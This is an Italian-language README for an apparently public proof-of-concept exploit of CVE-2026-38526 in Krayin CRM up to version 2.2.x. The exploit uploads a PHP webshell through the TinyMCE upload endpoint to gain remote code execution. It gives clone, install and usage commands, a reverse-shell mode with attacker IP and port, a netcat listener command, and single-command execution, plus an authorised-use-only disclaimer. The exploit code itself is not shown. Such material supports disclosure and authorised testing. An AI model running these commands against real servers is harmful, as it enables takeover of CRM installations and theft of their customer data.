
Prova di concetto di CVE-2026-38526 in Krayin CRM <= v2.2.x. Caricamento arbitrario di file che porta all'esecuzione remota di codice.
Krayin CRM (≤ 2.2.x) - Caricamento file senza restrizioni che porta all'esecuzione remota di codice.
Questo PoC sfrutta l'endpoint vulnerabile di upload di TinyMCE (/admin/tinymce/upload) per caricare una webshell PHP e ottenere l'esecuzione di comandi sul server.
git clone https://github.com/pawpic/CVE-2026-38526-POC
pip3 install requests beautifulsoup4
Utilizzo
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
--lhost YOUR_IP \
--lport 4444
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
-c "whoami"
| Argomento | Descrizione | Obbligatorio |
|---|---|---|
| -u, --url | URL di base del target | Sì |
| -e, --email | Email di accesso | Sì |
| -p, --password | Password di accesso | Sì |
| -c, --cmd | Esegui un singolo comando | No |
| --lhost | Il tuo IP per la reverse shell | Sì (se non si usa --cmd) |
| --lport | Porta di ascolto | No (predefinita: 4444) |
Avvia listener:
nc -lvnp 4444
Esegui l'exploit:
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR
Questo exploit è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'uso non autorizzato contro sistemi per i quali non si dispone di esplicita autorizzazione al test è illegale.
Versioni interessate
Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526
Autore: pawpic Data: 2026